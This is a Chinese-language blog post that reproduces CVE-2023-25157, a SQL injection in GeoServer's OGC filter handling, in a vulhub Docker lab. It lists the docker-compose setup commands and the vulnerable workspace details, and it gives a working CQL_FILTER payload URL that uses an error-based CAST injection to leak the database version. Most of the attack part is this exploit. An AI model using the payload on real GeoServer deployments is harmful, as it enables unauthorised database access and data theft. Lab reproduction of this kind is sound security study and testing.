GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157)vulhub漏洞复现

GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157)

GeoServer是一款JAVA编写的、开源的、用于共享地理空间数据的软件服务器。GeoServer实现了 开放地理空间信息联盟(OGC )标准下WFS、WMS、WCS、WMTS等格式的发布。
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。在版本2.22.1和2.21.4及以前,多个OGC表达式中均存在SQL注入漏洞。

vulhub漏洞复现

cd vulhub-master/
cd geoserver/
cd CVE-2023-25157
docker-compose build
docker-compose up -d
docker-compose ps

访问
http://192.168.126.128:8080/geoserver/web/?0即可查看到GeoServer的首页。
GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157)vulhub漏洞复现_第1张图片

在利用漏洞前,需要目标服务器中存在类型是PostGIS的数据空间(datastore)和工作空间(workspace)。在Vulhub中,已经包含满足条件的工作空间,其信息如下:
Workspace name: vulhub
Data store name: pg
Feature type (table) name: example
One of attribute from feature type: name
构造payload

http://192.168.126.128:8080/geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name,'x'') = true and 1=(SELECT CAST ((SELECT version()) AS integer)) -- ') = true

GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157)vulhub漏洞复现_第2张图片

成功注入获取版本信息。

你可能感兴趣的:(漏洞复现,sql,web安全,网络安全)